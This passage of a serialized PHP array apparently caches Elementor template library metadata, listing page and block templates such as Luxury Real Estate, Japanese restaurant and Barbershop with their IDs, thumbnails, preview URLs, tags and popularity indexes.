:\"id\";i:22417;s:5:\"title\";s:52:\"Finance Learning Platform – Under Construction\";s:9:\"thumbnail\";s:89:\"https://library.elementor.com/wp-content/uploads/2021/04/Library-Pic-Finance-Platform.png\";s:12:\"tmpl_created\";i:1647354987;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:143:\"https://library.elementor.com/finance-learning-platform-under-construction/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:4:\"page\";s:11:\"access_tier\";s:9:\"essential\";s:7:\"subtype\";s:4:\"page\";s:4:\"tags\";s:27:\"[\"Finance\",\"Landing Pages\"]\";s:10:\"menu_order\";i:89;s:16:\"popularity_index\";i:-1;s:11:\"trend_index\";i:-1;s:18:\"editor_layout_type\";s:0:\"\";s:15:\"minimum_version\";s:5:\"0.0.0\";s:26:\"minimum_hello_plus_version\";s:5:\"0.0.0\";s:8:\"products\";s:7:\"regular\";s:17:\"has_page_settings\";s:1:\"1\";s:6:\"is_pro\";s:1:\"1\";s:12:\"access_level\";i:1;}i:388;a:21:{s:4:\"tmpl\";i:1040;s:2:\"id\";i:14947;s:5:\"title\";s:33:\"Flooring company – Services\";s:9:\"thumbnail\";s:69:\"https://library.elementor.com/wp-content/uploads/2020/08/Services.png\";s:12:\"tmpl_created\";i:1597740551;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:124:\"https://library.elementor.com/flooring-company-services/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:4:\"page\";s:11:\"access_tier\";s:9:\"essential\";s:7:\"subtype\";s:4:\"page\";s:4:\"tags\";s:39:\"[\"Flooring company\",\"Flooring website\"]\";s:10:\"menu_order\";i:90;s:16:\"popularity_index\";i:538;s:11:\"trend_index\";i:392;s:18:\"editor_layout_type\";s:0:\"\";s:15:\"minimum_version\";s:5:\"0.0.0\";s:26:\"minimum_hello_plus_version\";s:5:\"0.0.0\";s:8:\"products\";s:7:\"regular\";s:17:\"has_page_settings\";s:1:\"1\";s:6:\"is_pro\";s:1:\"1\";s:12:\"access_level\";i:1;}i:389;a:21:{s:4:\"tmpl\";i:1039;s:2:\"id\";i:14901;s:5:\"title\";s:29:\"Flooring Company – Home\";s:9:\"thumbnail\";s:65:\"https://library.elementor.com/wp-content/uploads/2020/08/Home.png\";s:12:\"tmpl_created\";i:1597740474;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:120:\"https://library.elementor.com/flooring-company-home/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:4:\"page\";s:11:\"access_tier\";s:9:\"essential\";s:7:\"subtype\";s:4:\"page\";s:4:\"tags\";s:39:\"[\"Flooring company\",\"Flooring website\"]\";s:10:\"menu_order\";i:91;s:16:\"popularity_index\";i:387;s:11:\"trend_index\";i:185;s:18:\"editor_layout_type\";s:0:\"\";s:15:\"minimum_version\";s:5:\"0.0.0\";s:26:\"minimum_hello_plus_version\";s:5:\"0.0.0\";s:8:\"products\";s:7:\"regular\";s:17:\"has_page_settings\";s:1:\"1\";s:6:\"is_pro\";s:1:\"1\";s:12:\"access_level\";i:1;}i:390;a:21:{s:4:\"tmpl\";i:687;s:2:\"id\";i:8977;s:5:\"title\";s:9:\"archive 4\";s:9:\"thumbnail\";s:74:\"https://library.elementor.com/wp-content/uploads/2018/06/Archive_350.4.jpg\";s:12:\"tmpl_created\";i:1528700326;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:115:\"https://library.elementor.com/blocks/archive-4/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"block\";s:11:\"access_tier\";s:9:\"essential\";s:7:\"subtype\";s:7:\"archive\";s:4:\"tags\";s:2:\"[]\";s:10:\"menu_order\";i:91;s:16:\"popularity_index\";i:354;s:11:\"trend_index\";i:396;s:18:\"editor_layout_type\";s:0:\"\";s:15:\"minimum_version\";s:5:\"0.0.0\";s:26:\"minimum_hello_plus_version\";s:5:\"0.0.0\";s:8:\"products\";s:7:\"regular\";s:17:\"has_page_settings\";s:1:\"0\";s:6:\"is_pro\";s:1:\"1\";s:12:\"access_level\";i:1;}i:391;a:21:{s:4:\"tmpl\";i:1252;s:2:\"id\";i:22146;s:5:\"title\";s:36:\"Home Decor Store – Coming Soon\";s:9:\"thumbnail\";s:84:\"https://library.elementor.com/wp-content/uploads/2021/04/Library-Pic-Home-Decore.png\";s:12:\"tmpl_created\";i:1647177514;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:127:\"https://library.elementor.com/home-decor-store-coming-soon/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:4:\"page\";s:11:\"access_tier\";s:9:\"essential\";s:7:\"subtype\";s:4:\"page\";s:4:\"tags\";s:57:\"[\"Coming Soon\",\"Decor\",\"Interior Design\",\"Landing Pages\"]\";s:10:\"menu_order\";i:92;s:16:\"popularity_index\";i:-1;s:11:\"trend_index\";i:-1;s:18:\"editor_layout_type\";s:0:\"\";s:15:\"minimum_version\";s:5:\"0.0.0\";s:26:\"minimum_hello_plus_version\";s:5:\"0.0.0\";s:8:\"products\";s:7:\"regular\";s:17:\"has_page_settings\";s:1:\"1\";s:6:\"is_pro\";s:1:\"1\";s:12:\"access_level\";i:1;}i:392;a:21:{s:4:\"tmpl\";i:688;s:2:\"id\";i:8981;s:5:\"title\";s:9:\"archive 5\";s:9:\"thumbnail\";s:74:\"https://library.elementor.com/wp-content/uploads/2018/06/Archive_350.5.jpg\";s:12:\"tmpl_created\";i:1528700484;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:115:\"https://library.elementor.com/blocks/archive-5/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"block\";s:11:\"access_tier\";s:9:\"essential\";s:7:\"subtype\";s:7:\"archive\";s:4:\"tags\";s:2:\"[]\";s:10:\"menu_order\";i:93;s:16:\"popularity_index\";i:333;s:11:\"trend_index\";i:195;s:18:\"editor_layout_type\";s:0:\"\";s:15:\"minimum_version\";s:5:\"0.0.0\";s:26:\"minimum_hello_plus_version\";s:5:\"0.0.0\";s:8:\"products\";s:7:\"regular\";s:17:\"has_page_settings\";s:1:\"0\";s:6:\"is_pro\";s:1:\"1\";s:12:\"access_level\";i:1;}i:393;a:21:{s:4:\"tmpl\";i:1021;s:2:\"id\";i:14737;s:5:\"title\";s:32:\"Luxury Real Estate – About\";s:9:\"thumbnail\";s:66:\"https://library.elementor.com/wp-content/uploads/2020/07/About.png\";s:12:\"tmpl_created\";i:1595313527;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:128:\"https://library.elementor.com/luxury-real-estate-about-page/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:4:\"page\";s:11:\"access_tier\";s:9:\"essential\";s:7:\"subtype\";s:4:\"page\";s:4:\"tags\";s:28:\"[\"Real estate\",\"Realestate\"]\";s:10:\"menu_order\";i:93;s:16:\"popularity_index\";i:150;s:11:\"trend_index\";i:447;s:18:\"editor_layout_type\";s:0:\"\";s:15:\"minimum_version\";s:5:\"0.0.0\";s:26:\"minimum_hello_plus_version\";s:5:\"0.0.0\";s:8:\"products\";s:7:\"regular\";s:17:\"has_page_settings\";s:1:\"0\";s:6:\"is_pro\";s:1:\"1\";s:12:\"access_level\";i:1;}i:394;a:21:{s:4:\"tmpl\";i:689;s:2:\"id\";i:8985;s:5:\"title\";s:9:\"archive 6\";s:9:\"thumbnail\";s:74:\"https://library.elementor.com/wp-content/uploads/2018/06/Archive_350.6.jpg\";s:12:\"tmpl_created\";i:1528700612;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:115:\"https://library.elementor.com/blocks/archive-6/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"block\";s:11:\"access_tier\";s:9:\"essential\";s:7:\"subtype\";s:7:\"archive\";s:4:\"tags\";s:2:\"[]\";s:10:\"menu_order\";i:94;s:16:\"popularity_index\";i:204;s:11:\"trend_index\";i:95;s:18:\"editor_layout_type\";s:0:\"\";s:15:\"minimum_version\";s:5:\"0.0.0\";s:26:\"minimum_hello_plus_version\";s:5:\"0.0.0\";s:8:\"products\";s:7:\"regular\";s:17:\"has_page_settings\";s:1:\"0\";s:6:\"is_pro\";s:1:\"1\";s:12:\"access_level\";i:1;}i:395;a:21:{s:4:\"tmpl\";i:1020;s:2:\"id\";i:14756;s:5:\"title\";s:34:\"Luxury Real Estate – Contact\";s:9:\"thumbnail\";s:71:\"https://library.elementor.com/wp-content/uploads/2020/07/Contact-Us.png\";s:12:\"tmpl_created\";i:1595313519;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:133:\"https://library.elementor.com/luxury-real-estate-contact-us-page/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:4:\"page\";s:11:\"access_tier\";s:9:\"essential\";s:7:\"subtype\";s:4:\"page\";s:4:\"tags\";s:28:\"[\"Real estate\",\"Realestate\"]\";s:10:\"menu_order\";i:94;s:16:\"popularity_index\";i:610;s:11:\"trend_index\";i:569;s:18:\"editor_layout_type\";s:0:\"\";s:15:\"minimum_version\";s:5:\"0.0.0\";s:26:\"minimum_hello_plus_version\";s:5:\"0.0.0\";s:8:\"products\";s:7:\"regular\";s:17:\"has_page_settings\";s:1:\"0\";s:6:\"is_pro\";s:1:\"1\";s:12:\"access_level\";i:1;}i:396;a:21:{s:4:\"tmpl\";i:1019;s:2:\"id\";i:14716;s:5:\"title\";s:31:\"Luxury Real Estate – Home\";s:9:\"thumbnail\";s:65:\"https://library.elementor.com/wp-content/uploads/2020/07/Home.png\";s:12:\"tmpl_created\";i:1595313512;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:127:\"https://library.elementor.com/luxury-real-estate-home-page/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:4:\"page\";s:11:\"access_tier\";s:9:\"essential\";s:7:\"subtype\";s:4:\"page\";s:4:\"tags\";s:28:\"[\"Real estate\",\"Realestate\"]\";s:10:\"menu_order\";i:95;s:16:\"popularity_index\";i:394;s:11:\"trend_index\";i:165;s:18:\"editor_layout_type\";s:0:\"\";s:15:\"minimum_version\";s:5:\"0.0.0\";s:26:\"minimum_hello_plus_version\";s:5:\"0.0.0\";s:8:\"products\";s:7:\"regular\";s:17:\"has_page_settings\";s:1:\"0\";s:6:\"is_pro\";s:1:\"1\";s:12:\"access_level\";i:1;}i:397;a:21:{s:4:\"tmpl\";i:690;s:2:\"id\";i:8989;s:5:\"title\";s:9:\"archive 7\";s:9:\"thumbnail\";s:74:\"https://library.elementor.com/wp-content/uploads/2018/06/Archive_350.7.jpg\";s:12:\"tmpl_created\";i:1528701063;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:115:\"https://library.elementor.com/blocks/archive-7/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"block\";s:11:\"access_tier\";s:9:\"essential\";s:7:\"subtype\";s:7:\"archive\";s:4:\"tags\";s:2:\"[]\";s:10:\"menu_order\";i:96;s:16:\"popularity_index\";i:208;s:11:\"trend_index\";i:111;s:18:\"editor_layout_type\";s:0:\"\";s:15:\"minimum_version\";s:5:\"0.0.0\";s:26:\"minimum_hello_plus_version\";s:5:\"0.0.0\";s:8:\"products\";s:7:\"regular\";s:17:\"has_page_settings\";s:1:\"0\";s:6:\"is_pro\";s:1:\"1\";s:12:\"access_level\";i:1;}i:398;a:21:{s:4:\"tmpl\";i:1018;s:2:\"id\";i:14763;s:5:\"title\";s:31:\"Luxury Real Estate – News\";s:9:\"thumbnail\";s:73:\"https://library.elementor.com/wp-content/uploads/2020/07/news-Archive.png\";s:12:\"tmpl_created\";i:1595313273;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:127:\"https://library.elementor.com/luxury-real-estate-news-page/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:4:\"page\";s:11:\"access_tier\";s:9:\"essential\";s:7:\"subtype\";s:4:\"page\";s:4:\"tags\";s:28:\"[\"Real estate\",\"Realestate\"]\";s:10:\"menu_order\";i:96;s:16:\"popularity_index\";i:404;s:11:\"trend_index\";i:167;s:18:\"editor_layout_type\";s:0:\"\";s:15:\"minimum_version\";s:5:\"0.0.0\";s:26:\"minimum_hello_plus_version\";s:5:\"0.0.0\";s:8:\"products\";s:7:\"regular\";s:17:\"has_page_settings\";s:1:\"0\";s:6:\"is_pro\";s:1:\"1\";s:12:\"access_level\";i:1;}i:399;a:21:{s:4:\"tmpl\";i:1283;s:2:\"id\";i:22423;s:5:\"title\";s:39:\"Online Store – Under Construction\";s:9:\"thumbnail\";s:85:\"https://library.elementor.com/wp-content/uploads/2021/04/Library-Pic-Online-Store.png\";s:12:\"tmpl_created\";i:1647355154;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:130:\"https://library.elementor.com/online-store-under-construction/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:4:\"page\";s:11:\"access_tier\";s:4:\"free\";s:7:\"subtype\";s:4:\"page\";s:4:\"tags\";s:59:\"[\"Landing Pages\",\"Online Shop\",\"Shop\",\"Under Construction\"]\";s:10:\"menu_order\";i:97;s:16:\"popularity_index\";i:-1;s:11:\"trend_index\";i:-1;s:18:\"editor_layout_type\";s:0:\"\";s:15:\"minimum_version\";s:5:\"0.0.0\";s:26:\"minimum_hello_plus_version\";s:5:\"0.0.0\";s:8:\"products\";s:7:\"regular\";s:17:\"has_page_settings\";s:1:\"1\";s:6:\"is_pro\";s:1:\"0\";s:12:\"access_level\";i:0;}i:400;a:21:{s:4:\"tmpl\";i:691;s:2:\"id\";i:8996;s:5:\"title\";s:9:\"archive 8\";s:9:\"thumbnail\";s:74:\"https://library.elementor.com/wp-content/uploads/2018/06/Archive_350.8.jpg\";s:12:\"tmpl_created\";i:1528701290;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:115:\"https://library.elementor.com/blocks/archive-8/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"block\";s:11:\"access_tier\";s:9:\"essential\";s:7:\"subtype\";s:7:\"archive\";s:4:\"tags\";s:2:\"[]\";s:10:\"menu_order\";i:98;s:16:\"popularity_index\";i:227;s:11:\"trend_index\";i:153;s:18:\"editor_layout_type\";s:0:\"\";s:15:\"minimum_version\";s:5:\"0.0.0\";s:26:\"minimum_hello_plus_version\";s:5:\"0.0.0\";s:8:\"products\";s:7:\"regular\";s:17:\"has_page_settings\";s:1:\"0\";s:6:\"is_pro\";s:1:\"1\";s:12:\"access_level\";i:1;}i:401;a:21:{s:4:\"tmpl\";i:1010;s:2:\"id\";i:13960;s:5:\"title\";s:32:\"Japanese restaurant – Home\";s:9:\"thumbnail\";s:70:\"https://library.elementor.com/wp-content/uploads/2020/06/Home-Page.jpg\";s:12:\"tmpl_created\";i:1592289775;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:128:\"https://library.elementor.com/japanese-restaurant-home-page/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:4:\"page\";s:11:\"access_tier\";s:9:\"essential\";s:7:\"subtype\";s:4:\"page\";s:4:\"tags\";s:32:\"[\"Food\",\"Japanese\",\"Restaurant\"]\";s:10:\"menu_order\";i:98;s:16:\"popularity_index\";i:537;s:11:\"trend_index\";i:287;s:18:\"editor_layout_type\";s:0:\"\";s:15:\"minimum_version\";s:5:\"0.0.0\";s:26:\"minimum_hello_plus_version\";s:5:\"0.0.0\";s:8:\"products\";s:7:\"regular\";s:17:\"has_page_settings\";s:1:\"1\";s:6:\"is_pro\";s:1:\"1\";s:12:\"access_level\";i:1;}i:402;a:21:{s:4:\"tmpl\";i:1284;s:2:\"id\";i:22428;s:5:\"title\";s:40:\"Travel Agency – Under Construction\";s:9:\"thumbnail\";s:88:\"https://library.elementor.com/wp-content/uploads/2021/04/Library-Pic-Travel-Agency-1.png\";s:12:\"tmpl_created\";i:1647355339;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:131:\"https://library.elementor.com/travel-agency-under-construction/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:4:\"page\";s:11:\"access_tier\";s:9:\"essential\";s:7:\"subtype\";s:4:\"page\";s:4:\"tags\";s:56:\"[\"Agency\",\"Landing Pages\",\"Travel\",\"Under Construction\"]\";s:10:\"menu_order\";i:99;s:16:\"popularity_index\";i:-1;s:11:\"trend_index\";i:-1;s:18:\"editor_layout_type\";s:0:\"\";s:15:\"minimum_version\";s:5:\"0.0.0\";s:26:\"minimum_hello_plus_version\";s:5:\"0.0.0\";s:8:\"products\";s:7:\"regular\";s:17:\"has_page_settings\";s:1:\"1\";s:6:\"is_pro\";s:1:\"1\";s:12:\"access_level\";i:1;}i:403;a:21:{s:4:\"tmpl\";i:692;s:2:\"id\";i:9001;s:5:\"title\";s:9:\"archive 9\";s:9:\"thumbnail\";s:74:\"https://library.elementor.com/wp-content/uploads/2018/06/Archive_350.9.jpg\";s:12:\"tmpl_created\";i:1528701433;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:115:\"https://library.elementor.com/blocks/archive-9/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"block\";s:11:\"access_tier\";s:9:\"essential\";s:7:\"subtype\";s:7:\"archive\";s:4:\"tags\";s:2:\"[]\";s:10:\"menu_order\";i:100;s:16:\"popularity_index\";i:265;s:11:\"trend_index\";i:208;s:18:\"editor_layout_type\";s:0:\"\";s:15:\"minimum_version\";s:5:\"0.0.0\";s:26:\"minimum_hello_plus_version\";s:5:\"0.0.0\";s:8:\"products\";s:7:\"regular\";s:17:\"has_page_settings\";s:1:\"0\";s:6:\"is_pro\";s:1:\"1\";s:12:\"access_level\";i:1;}i:404;a:21:{s:4:\"tmpl\";i:1007;s:2:\"id\";i:13993;s:5:\"title\";s:45:\"Japanese restaurant – Chef’s Menu\";s:9:\"thumbnail\";s:77:\"https://library.elementor.com/wp-content/uploads/2020/06/Chef_s-Menu-Page.jpg\";s:12:\"tmpl_created\";i:1592289691;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:129:\"https://library.elementor.com/japanese-restaurant-chefs-menu/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:4:\"page\";s:11:\"access_tier\";s:9:\"essential\";s:7:\"subtype\";s:4:\"page\";s:4:\"tags\";s:32:\"[\"Food\",\"Japanese\",\"Restaurant\"]\";s:10:\"menu_order\";i:100;s:16:\"popularity_index\";i:651;s:11:\"trend_index\";i:675;s:18:\"editor_layout_type\";s:0:\"\";s:15:\"minimum_version\";s:5:\"0.0.0\";s:26:\"minimum_hello_plus_version\";s:5:\"0.0.0\";s:8:\"products\";s:7:\"regular\";s:17:\"has_page_settings\";s:1:\"1\";s:6:\"is_pro\";s:1:\"1\";s:12:\"access_level\";i:1;}i:405;a:21:{s:4:\"tmpl\";i:1006;s:2:\"id\";i:14012;s:5:\"title\";s:36:\"Japanese restaurant – Bar Menu\";s:9:\"thumbnail\";s:74:\"https://library.elementor.com/wp-content/uploads/2020/06/Bar-Menu-Page.jpg\";s:12:\"tmpl_created\";i:1592289665;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:127:\"https://library.elementor.com/japanese-restaurant-bar-menu/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:4:\"page\";s:11:\"access_tier\";s:9:\"essential\";s:7:\"subtype\";s:4:\"page\";s:4:\"tags\";s:32:\"[\"Food\",\"Japanese\",\"Restaurant\"]\";s:10:\"menu_order\";i:101;s:16:\"popularity_index\";i:735;s:11:\"trend_index\";i:829;s:18:\"editor_layout_type\";s:0:\"\";s:15:\"minimum_version\";s:5:\"0.0.0\";s:26:\"minimum_hello_plus_version\";s:5:\"0.0.0\";s:8:\"products\";s:7:\"regular\";s:17:\"has_page_settings\";s:1:\"1\";s:6:\"is_pro\";s:1:\"1\";s:12:\"access_level\";i:1;}i:406;a:21:{s:4:\"tmpl\";i:1005;s:2:\"id\";i:13917;s:5:\"title\";s:33:\"Japanese restaurant – About\";s:9:\"thumbnail\";s:71:\"https://library.elementor.com/wp-content/uploads/2020/06/About-Page.jpg\";s:12:\"tmpl_created\";i:1592289629;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:124:\"https://library.elementor.com/japanese-restaurant-about/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:4:\"page\";s:11:\"access_tier\";s:9:\"essential\";s:7:\"subtype\";s:4:\"page\";s:4:\"tags\";s:32:\"[\"Food\",\"Japanese\",\"Restaurant\"]\";s:10:\"menu_order\";i:102;s:16:\"popularity_index\";i:640;s:11:\"trend_index\";i:389;s:18:\"editor_layout_type\";s:0:\"\";s:15:\"minimum_version\";s:5:\"0.0.0\";s:26:\"minimum_hello_plus_version\";s:5:\"0.0.0\";s:8:\"products\";s:7:\"regular\";s:17:\"has_page_settings\";s:1:\"1\";s:6:\"is_pro\";s:1:\"1\";s:12:\"access_level\";i:1;}i:407;a:21:{s:4:\"tmpl\";i:997;s:2:\"id\";i:13528;s:5:\"title\";s:22:\"Barbershop – 404\";s:9:\"thumbnail\";s:69:\"https://library.elementor.com/wp-content/uploads/2020/05/404-Page.jpg\";s:12:\"tmpl_created\";i:1589893152;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:120:\"https://library.elementor.com/blocks/barbershop-404/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"block\";s:11:\"access_tier\";s:9:\"essential\";s:7:\"subtype\";s:8:\"404 page\";s:4:\"tags\";s:34:\"[\"404\",\"Barber Shop\",\"Barbershop\"]\";s:10:\"menu_order\";i:103;s:16:\"popularity_index\";i:768;s:11:\"trend_index\";i:681;s:18:\"editor_layout_type\";s:0:\"\";s:15:\"minimum_version\";s:5:\"0.0.0\";s:26:\"minimum_hello_plus_version\";s:5:\"0.0.0\";s:8:\"products\";s:7:\"regular\";s:17:\"has_page_settings\";s:1:\"1\";s:6:\"is_pro\";s:1:\"1\";s:12:\"access_level\";i:1;}i:408;a:21:{s:4:\"tmpl\";i:1009;s:2:\"id\";i:13937;s:5:\"title\";s:35:\"Japanese restaurant – Gallery\";s:9:\"thumbnail\";s:73:\"https://library.elementor.com/wp-content/uploads/2020/06/Gallery-Page.jpg\";s:12:\"tmpl_created\";i:1592289748;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:126:\"https://library.elementor.com/japanese-restaurant-gallery/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:4:\"page\";s:11:\"access_tier\";s:9:\"essential\";s:7:\"subtype\";s:4:\"page\";s:4:\"tags\";s:32:\"[\"Food\",\"Japanese\",\"Restaurant\"]\";s:10:\"menu_order\";i:103;s:16:\"popularity_index\";i:648;s:11:\"trend_index\";i:551;s:18:\"editor_layout_type\";s:0:\"\";s:15:\"minimum_version\";s:5:\"0.0.0\";s:26:\"minimum_hello_plus_version\";s:5:\"0.0.0\";s:8:\"products\";s:7:\"regular\";s:17:\"has_page_settings\";s:1:\"1\";s:6:\"is_pro\";s:1:\"1\";s:12:\"access_level\";i:1;}i:409;a:21:{s:4:\"tmpl\";i:1008;s:2:\"id\";i:14030;s:5:\"title\";s:34:\"Japanese restaurant – Events\";s:9:\"thumbnail\";s:72:\"https://library.elementor.com/wp-content/uploads/2020/06/Events-Page.jpg\";s:12:\"tmpl_created\";i:1592289713;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:125:\"https://library.elementor.com/japanese-restaurant-events/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:4:\"page\";s:11:\"access_tier\";s:9:\"essential\";s:7:\"subtype\";s:4:\"page\";s:4:\"tags\";s:32:\"[\"Food\",\"Japanese\",\"Restaurant\"]\";s:10:\"menu_order\";i:104;s:16:\"popularity_index\";i:723;s:11:\"trend_index\";i:711;s:18:\"editor_layout_type\";s:0:\"\";s:15:\"minimum_version\";s:5:\"0.0.0\";s:26:\"minimum_hello_plus_version\";s:5:\"0.0.0\";s:8:\"products\";s:7:\"regular\";s:17:\"has_page_settings\";s:1:\"1\";s:6:\"is_pro\";s:1:\"1\";s:12:\"access_level\";i:1;}i:410;a:21:{s:4:\"tmpl\";i:998;s:2:\"id\";i:13518;s:5:\"title\";s:26:\"Barbershop – Archive\";s:9:\"thumbnail\";s:70:\"https://library.elementor.com/wp-content/uploads/2020/05/Blog-Page.jpg\";s:12:\"tmpl_created\";i:1589893157;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:124:\"https://library.elementor.com/blocks/barbershop-archive/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"block\";s:11:\"access_tier\";s:9:\"essential\";s:7:\"subtype\";s:7:\"archive\";s:4:\"tags\";s:28:\"[\"Barber Shop\",\"Barbershop\"]\";s:10:\"menu_order\";i:105;s:16:\"popularity_index\";i:737;s:11:\"trend_index\";i:523;s:18:\"editor_layout_type\";s:0:\"\";s:15:\"minimum_version\";s:5:\"0.0.0\";s:26:\"minimum_hello_plus_version\";s:5:\"0.0.0\";s:8:\"products\";s:7:\"regular\";s:17:\"has_page_settings\";s:1:\"1\";s:6:\"is_pro\";s:1:\"1\";s:12:\"access_level\";i:1;}i:411;a:21:{s:4:\"tmpl\";i:1016;s:2:\"id\";i:13984;s:5:\"title\";s:40:\"Japanese restaurant – Reservations\";s:9:\"thumbnail\";s:73:\"https://library.elementor.com/wp-content/uploads/2020/06/reservations.jpg\";s:12:\"tmpl_created\";i:1592294757;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:131:\"https://library.elementor.com/japanese-restaurant-reservations/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:4:\"page\";s:11:\"access_tier\";s:9:\"essential\";s:7:\"subtype\";s:4:\"page\";s:4:\"tags\";s:32:\"[\"Food\",\"Japanese\",\"Restaurant\"]\";s:10:\"menu_order\";i:105;s:16:\"popularity_index\";i:715;s:11:\"trend_index\";i:727;s:18:\"editor_layout_type\";s:0:\"\";s:15:\"minimum_version\";s:5:\"0.0.0\";s:26:\"minimum_hello_plus_version\";s:5:\"0.0.0\";s:8:\"products\";s:7:\"regular\";s:17:\"has_page_settings\";s:1:\"1\";s:6:\"is_pro\";s:1:\"1\";s:12:\"access_level\";i:1;}i:412;a:21:{s:4:\"tmpl\";i:999;s:2:\"id\";i:13479;s:5:\"title\";s:23:\"Barbershop – Home\";s:9:\"thumbnail\";s:70:\"https://library.elementor.com/wp-content/uploads/2020/05/Home-Page.jpg\";s:12:\"tmpl_created\";i:1589893275;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:114:\"https://library.elementor.com/barbershop-home/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:4:\"page\";s:11:\"access_tier\";s:9:\"essential\";s:7:\"subtype\";s:4:\"page\";s:4:\"tags\";s:28:\"[\"Barber Shop\",\"Barbershop\"]\";s:10:\"menu_order\";i:106;s:16:\"popularity_index\";i:683;s:11:\"trend_index\";i:832;s:18:\"editor_layout_type\";s:0:\"\";s:15:\"minimum_version\";s:5:\"0.0.0\";s:26:\"minimum_hello_plus_version\";s:5:\"0.0.0\";s:8:\"products\";s:7:\"regular\";s:17:\"has_page_settings\";s:1:\"1\";s:6:\"is_pro\";s:1:\"1\";s:12:\"access_level\";i:1;}i:413;a:21:{s:4:\"tmpl\";i:996;s:2:\"id\";i:13604;s:5:\"title\";s:25:\"Barbershop – Footer\";s:9:\"thumbnail\";s:73:\"https://library.elementor.com/wp-content/uploads/2020/05/Footer-Small.jpg\";s:12:\"tmpl_created\";i:1589893147;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:123:\"https://library.elementor.com/blocks/barbershop-footer/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"block\";s:11:\"access_tier\";s:9:\"essential\";s:7:\"subtype\";s:6:\"footer\";s:4:\"tags\";s:37:\"[\"Barber Shop\",\"Barbershop\",\"Footer\"]\";s:10:\"menu_order\";i:107;s:16:\"popularity_index\";i:555;s:11:\"trend_index\";i:267;s:18:\"editor_layout_type\";s:0:\"\";s:15:\"minimum_version\";s:5:\"0.0.0\";s:26:\"minimum_hello_plus_version\";s:5:\"0.0.0\";s:8:\"products\";s:7:\"regular\";s:17:\"has_page_settings\";s:1:\"1\";s:6:\"is_pro\";s:1:\"1\";s:12:\"access_level\";i:1;}i:414;a:21:{s:4:\"tmpl\";i:1000;s:2:\"id\";i:13503;s:5:\"title\";s:24:\"Barbershop – About\";s:9:\"thumbnail\";s:71:\"https://library.elementor.com/wp-content/uploads/2020/05/About-Page.jpg\";s:12:\"tmpl_created\";i:1589893289;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:115:\"https://library.elementor.com/barbershop-about/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:4:\"page\";s:11:\"access_tier\";s:9:\"essential\";s:7:\"subtype\";s:4:\"page\";s:4:\"tags\";s:28:\"[\"Barber 